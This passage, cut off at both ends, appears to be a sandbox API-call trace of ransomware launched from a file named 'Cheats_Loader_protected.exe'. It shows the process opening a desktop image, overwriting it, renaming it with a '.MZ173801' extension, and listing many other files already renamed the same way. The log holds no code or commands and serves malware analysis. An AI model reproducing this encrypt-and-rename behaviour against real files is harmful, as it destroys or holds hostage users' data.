U5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0124.151] GetCurrentThreadId () returned 0x1358 [0124.151] GetCurrentThreadId () returned 0x1358 [0124.151] GetCurrentThreadId () returned 0x1358 [0124.151] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\zcrVUSJG.png" (normalized: "c:\\users\\fd1hvy\\desktop\\zcrvusjg.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0124.151] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0124.151] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0124.151] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x1279e [0124.152] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0124.152] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x1279e, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x1279e, lpOverlapped=0x0) returned 1 [0124.153] CloseHandle (hObject=0x410) returned 1 [0124.154] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\zcrVUSJG.png" (normalized: "c:\\users\\fd1hvy\\desktop\\zcrvusjg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0124.155] WriteFile (in: hFile=0x410, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x1279e, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0x1279e, lpOverlapped=0x0) returned 1 [0124.157] CloseHandle (hObject=0x410) returned 1 [0124.158] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\zcrVUSJG.png" (normalized: "c:\\users\\fd1hvy\\desktop\\zcrvusjg.png"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\zcrVUSJG.png.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\zcrvusjg.png.mz173801")) returned 1 [0124.158] GetCurrentThreadId () returned 0x1358 [0124.158] GetCurrentThreadId () returned 0x1358 [0124.158] GetCurrentThreadId () returned 0x1358 [0124.158] GetCurrentThreadId () returned 0x1358 [0124.158] GetCurrentThreadId () returned 0x1358 [0124.158] GetCurrentThreadId () returned 0x1358 [0124.158] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe492b420, ftCreationTime.dwHighDateTime=0x1d5e641, ftLastAccessTime.dwLowDateTime=0xb651a2f0, ftLastAccessTime.dwHighDateTime=0x1d5edb3, ftLastWriteTime.dwLowDateTime=0xb651a2f0, ftLastWriteTime.dwHighDateTime=0x1d5edb3, nFileSizeHigh=0x0, nFileSizeLow=0x1279e, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="zcrVUSJG.png", cAlternateFileName="")) returned 0 [0124.158] GetLastError () returned 0x12 [0124.158] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0124.158] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xab46c972, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xab46c972, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0124.158] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0124.158] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.159] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xab46c972, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xab46c972, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0124.159] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.159] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.159] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda3a81d0, ftCreationTime.dwHighDateTime=0x1d5ebd0, ftLastAccessTime.dwLowDateTime=0xbc4e5260, ftLastAccessTime.dwHighDateTime=0x1d5eb9d, ftLastWriteTime.dwLowDateTime=0xaa8347a5, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x168cb, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="4BDKtV--GWe9D.avi.MZ173801", cAlternateFileName="4BDKTV~1.MZ1")) returned 1 [0124.159] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.159] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.159] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41e8b8c0, ftCreationTime.dwHighDateTime=0x1d5effe, ftLastAccessTime.dwLowDateTime=0xffeee3f0, ftLastAccessTime.dwHighDateTime=0x1d5e5f2, ftLastWriteTime.dwLowDateTime=0xaa8cd223, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xaf4b, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="4zq3s7.swf.MZ173801", cAlternateFileName="4ZQ3S7~1.MZ1")) returned 1 [0124.159] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.159] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.159] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13e3ad60, ftCreationTime.dwHighDateTime=0x1d5e791, ftLastAccessTime.dwLowDateTime=0xe18beb80, ftLastAccessTime.dwHighDateTime=0x1d5eb1d, ftLastWriteTime.dwLowDateTime=0xaa8cd223, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x119c0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="7s8kn42gORboEByd jhc.mkv.MZ173801", cAlternateFileName="7S8KN4~1.MZ1")) returned 1 [0124.159] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.159] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.159] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f6081d0, ftCreationTime.dwHighDateTime=0x1d5ef01, ftLastAccessTime.dwLowDateTime=0x6cae350, ftLastAccessTime.dwHighDateTime=0x1d5e921, ftLastWriteTime.dwLowDateTime=0xaa8f3527, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xf0b1, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="93FAioEJ-r.bmp.MZ173801", cAlternateFileName="93FAIO~1.MZ1")) returned 1 [0124.159] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.159] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.159] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e71dd30, ftCreationTime.dwHighDateTime=0x1d5eb24, ftLastAccessTime.dwLowDateTime=0x4d8c4d50, ftLastAccessTime.dwHighDateTime=0x1d5ee81, ftLastWriteTime.dwLowDateTime=0xaa91976c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x17386, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="a8W18 Y4u-HyG.jpg.MZ173801", cAlternateFileName="A8W18Y~1.MZ1")) returned 1 [0124.159] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.159] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.159] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b78c270, ftCreationTime.dwHighDateTime=0x1d5e28e, ftLastAccessTime.dwLowDateTime=0x6fcbf130, ftLastAccessTime.dwHighDateTime=0x1d5e789, ftLastWriteTime.dwLowDateTime=0xaa91976c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1763a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="BQ0-O.pptx.MZ173801", cAlternateFileName="BQ0-OP~1.MZ1")) returned 1 [0124.159] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.159] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.159] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fd3fb80, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x5fd3fb80, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x5e0a3800, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x11de00, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Cheats_Loader_protected.exe", cAlternateFileName="CHEATS~1.EXE")) returned 1 [0124.159] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.159] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.159] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8c54e0, ftCreationTime.dwHighDateTime=0x1d5e181, ftLastAccessTime.dwLowDateTime=0xd0487ac0, ftLastAccessTime.dwHighDateTime=0x1d5e14d, ftLastWriteTime.dwLowDateTime=0xaa91976c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1c42, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="cpaXWNDh4Pt4.mp4.MZ173801", cAlternateFileName="CPAXWN~1.MZ1")) returned 1 [0124.159] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.159] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.159] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0124.159] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c0cd140, ftCreationTime.dwHighDateTime=0x1d5e367, ftLastAccessTime.dwLowDateTime=0x5a5ce960, ftLastAccessTime.dwHighDateTime=0x1d5efe7, ftLastWriteTime.dwLowDateTime=0xaaa96e05, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xe19b, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="DX WjoqZK9o.m4a.MZ173801", cAlternateFileName="DXWJOQ~1.MZ1")) returned 1 [0124.159] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.159] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.159] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0985040, ftCreationTime.dwHighDateTime=0x1d5ecde, ftLastAccessTime.dwLowDateTime=0x73059b00, ftLastAccessTime.dwHighDateTime=0x1d5e23c, ftLastWriteTime.dwLowDateTime=0xaaabd099, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xe120, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="f7Dp_pgi57G6wvUm.mkv.MZ173801", cAlternateFileName="F7DP_P~1.MZ1")) returned 1 [0124.159] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.159] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.159] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78fdc030, ftCreationTime.dwHighDateTime=0x1d5e6c1, ftLastAccessTime.dwLowDateTime=0xa7692150, ftLastAccessTime.dwHighDateTime=0x1d5e5d4, ftLastWriteTime.dwLowDateTime=0xaaabd099, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x7e61, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="H4CXj5T.gif.MZ173801", cAlternateFileName="H4CXJ5~1.MZ1")) returned 1 [0124.160] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.160] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.160] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3612c10, ftCreationTime.dwHighDateTime=0x1d5e856, ftLastAccessTime.dwLowDateTime=0x93b74e60, ftLastAccessTime.dwHighDateTime=0x1d5efe9, ftLastWriteTime.dwLowDateTime=0xaaae32e2, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x82ef, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="hrJq.m4a.MZ173801", cAlternateFileName="HRJQM4~1.MZ1")) returned 1 [0124.160] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.160] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.160] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5f78b00, ftCreationTime.dwHighDateTime=0x1d5e82d, ftLastAccessTime.dwLowDateTime=0x85c27a20, ftLastAccessTime.dwHighDateTime=0x1d5e61e, ftLastWriteTime.dwLowDateTime=0xaaae32e2, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1aeb, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="If9wR_2_gcr9llsoyR.gif.MZ173801", cAlternateFileName="IF9WR_~1.MZ1")) returned 1 [0124.160] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.160] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.160] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ee4110, ftCreationTime.dwHighDateTime=0x1d5f09e, ftLastAccessTime.dwLowDateTime=0x3e4b08f0, ftLastAccessTime.dwHighDateTime=0x1d5eab6, ftLastWriteTime.dwLowDateTime=0xaaae32e2, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x996b, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="JA9a6Ju2ZS4.mkv.MZ173801", cAlternateFileName="JA9A6J~1.MZ1")) returned 1 [0124.160] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.160] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.160] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9cb4120, ftCreationTime.dwHighDateTime=0x1d5e8c9, ftLastAccessTime.dwLowDateTime=0x214954a0, ftLastAccessTime.dwHighDateTime=0x1d5ecb4, ftLastWriteTime.dwLowDateTime=0xaab7bc9f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x19d1, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Jkjm6i_saVP.avi.MZ173801", cAlternateFileName="JKJM6I~1.MZ1")) returned 1 [0124.160] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.160] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.160] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d7eac40, ftCreationTime.dwHighDateTime=0x1d5ec24, ftLastAccessTime.dwLowDateTime=0x9bb03fd0, ftLastAccessTime.dwHighDateTime=0x1d5e67c, ftLastWriteTime.dwLowDateTime=0xaab7bc9f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xf1c8, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="n4HyEznF.mkv.MZ173801", cAlternateFileName="N4HYEZ~1.MZ1")) returned 1 [0124.160] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.160] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.160] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe88ae0c0, ftCreationTime.dwHighDateTime=0x1d5e259, ftLastAccessTime.dwLowDateTime=0x2820ca40, ftLastAccessTime.dwHighDateTime=0x1d5edec, ftLastWriteTime.dwLowDateTime=0xaaba1f27, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1610, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="nWHuAKIfFRpShxOMaw.mp4.MZ173801", cAlternateFileName="NWHUAK~1.MZ1")) returned 1 [0124.160] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.160] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.160] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d633990, ftCreationTime.dwHighDateTime=0x1d5eb56, ftLastAccessTime.dwLowDateTime=0xc5bfd600, ftLastAccessTime.dwHighDateTime=0x1d5e0af, ftLastWriteTime.dwLowDateTime=0xaaba1f27, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x18631, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="o_sfpnC-AoY-JO.wav.MZ173801", cAlternateFileName="O_SFPN~1.MZ1")) returned 1 [0124.160] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.160] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.160] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf11302e0, ftCreationTime.dwHighDateTime=0x1d5e88f, ftLastAccessTime.dwLowDateTime=0x8cb4c480, ftLastAccessTime.dwHighDateTime=0x1d5e837, ftLastWriteTime.dwLowDateTime=0xaabc8191, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x18800, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="pZLG.mp4.MZ173801", cAlternateFileName="PZLGMP~1.MZ1")) returned 1 [0124.160] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.160] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.160] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2398d600, ftCreationTime.dwHighDateTime=0x1d5ef3d, ftLastAccessTime.dwLowDateTime=0xa2181a40, ftLastAccessTime.dwHighDateTime=0x1d5f0f5, ftLastWriteTime.dwLowDateTime=0xaac60a88, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x14fce, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="qgnj.wav.MZ173801", cAlternateFileName="QGNJWA~1.MZ1")) returned 1 [0124.160] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.160] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.160] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7f527a0, ftCreationTime.dwHighDateTime=0x1d5e79c, ftLastAccessTime.dwLowDateTime=0xbee91ea0, ftLastAccessTime.dwHighDateTime=0x1d5ef18, ftLastWriteTime.dwLowDateTime=0xaac60a88, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x14267, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="qMCV4VrTY-vx5.avi.MZ173801", cAlternateFileName="QMCV4V~1.MZ1")) returned 1 [0124.160] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.160] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.160] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x520f7810, ftCreationTime.dwHighDateTime=0x1d5e126, ftLastAccessTime.dwLowDateTime=0x9ba2a800, ftLastAccessTime.dwHighDateTime=0x1d5e73c, ftLastWriteTime.dwLowDateTime=0xaac86d62, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x72d3, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="RHvCNbn.mp4.MZ173801", cAlternateFileName="RHVCNB~1.MZ1")) returned 1 [0124.160] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.160] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.160] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf7a2780, 